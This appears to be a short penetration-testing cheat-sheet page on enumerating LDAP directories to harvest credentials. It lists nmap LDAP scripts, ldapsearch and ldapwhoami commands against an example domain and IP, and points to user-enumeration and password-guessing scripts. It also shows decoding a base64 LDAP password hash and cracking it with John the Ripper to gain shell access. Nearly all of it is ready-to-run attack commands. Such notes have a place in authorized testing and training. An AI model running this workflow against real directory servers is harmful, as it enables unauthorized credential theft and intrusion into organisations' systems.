LDAP
LDAP can be enumerate in a way to gain credentials
Last updated
Was this helpful?
LDAP can be enumerate in a way to gain credentials
Last updated
Was this helpful?
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
ldapsearch -x -b "dc=acme,dc=com" "*" -h 148.32.42.5 | awk '/dn: / {print $2}'
ldapsearch -x -D "cn=admin,dc=acme,dc=com" -s sub "cn=*" -h 148.32.42.5 | awk '/uid: /{print $2}' | nl
ldapwhoami -h ldap.acme.com -w "abcd123"
Use the ldap-users.pl script based oncewl scan or on my userslist.sh script. (see my github)
A website is a good way to get inspired.
Once we have a valid list of users, we can move forward to search for valid user and password combinations.
Use the ldap-pass.pl based on the word list of your choice.
Use ldapwhoami-dictonary.sh
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
The password hashes are encoded in base64 we can easly decode the string to extract the hash.
echo "e01ENX0wTHVBcXJ1R0diYmpVUlB3TG5KMUt3PT0=" | base64 -d
All these hashes can be loaded up in JTR and cracked to get shell access on the remote system.
This article can help :